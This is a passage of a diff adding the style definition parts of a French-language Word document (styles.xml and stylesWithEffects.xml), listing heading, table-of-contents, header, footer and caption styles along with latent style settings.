+  </w:latentStyles>
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+    <w:name w:val="Normal"/>
+    <w:qFormat/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Titre1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Titre1Car"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="00236FF1"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="480" w:after="0"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Titre2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Titre2Car"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00141610"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="200" w:after="0"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Titre3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Titre3Car"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00141610"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="200" w:after="0"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
+    <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="Aucuneliste">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Sansinterligne">
+    <w:name w:val="No Spacing"/>
+    <w:link w:val="SansinterligneCar"/>
+    <w:uiPriority w:val="1"/>
+    <w:qFormat/>
+    <w:rsid w:val="00236FF1"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="SansinterligneCar">
+    <w:name w:val="Sans interligne Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="Sansinterligne"/>
+    <w:uiPriority w:val="1"/>
+    <w:rsid w:val="00236FF1"/>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Textedebulles">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="TextedebullesCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00236FF1"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="TextedebullesCar">
+    <w:name w:val="Texte de bulles Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="Textedebulles"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00236FF1"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titre1Car">
+    <w:name w:val="Titre 1 Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="Titre1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00236FF1"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="28"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="En-ttedetabledesmatires">
+    <w:name w:val="TOC Heading"/>
+    <w:basedOn w:val="Titre1"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="39"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00236FF1"/>
+    <w:pPr>
+      <w:outlineLvl w:val="9"/>
+    </w:pPr>
+    <w:rPr>
+      <w:lang w:eastAsia="fr-FR"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00236FF1"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
+    <w:name w:val="Titre 2 Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="Titre2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00141610"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
+    <w:name w:val="Titre 3 Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="Titre3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00141610"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TM1">
+    <w:name w:val="toc 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DA5B49"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TM2">
+    <w:name w:val="toc 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DA5B49"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="220"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TM3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DA5B49"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="440"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Lienhypertexte">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DA5B49"/>
+    <w:rPr>
+      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="En-tte">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="En-tteCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="008720A4"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4536"/>
+        <w:tab w:val="right" w:pos="9072"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
+    <w:name w:val="En-tête Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="En-tte"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="008720A4"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Pieddepage">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="PieddepageCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="008720A4"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4536"/>
+        <w:tab w:val="right" w:pos="9072"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="PieddepageCar">
+    <w:name w:val="Pied de page Car"/>
+    <w:basedOn w:val="Policepardfaut"/>
+    <w:link w:val="Pieddepage"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="008720A4"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Lgende">
+    <w:name w:val="caption"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00BF4CF1"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+</w:styles>
+</file>
+
+<file path=word/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
+<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+  <w:docDefaults>
+    <w:rPrDefault>
+      <w:rPr>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+        <w:sz w:val="22"/>
+        <w:szCs w:val="22"/>
+        <w:lang w:val="fr-FR" w:eastAsia="en-US" w:bidi="ar-SA"/>
+      </w:rPr>
+    </w:rPrDefault>
+    <w:pPrDefault>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+    </w:pPrDefault>
+  </w:docDefaults>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
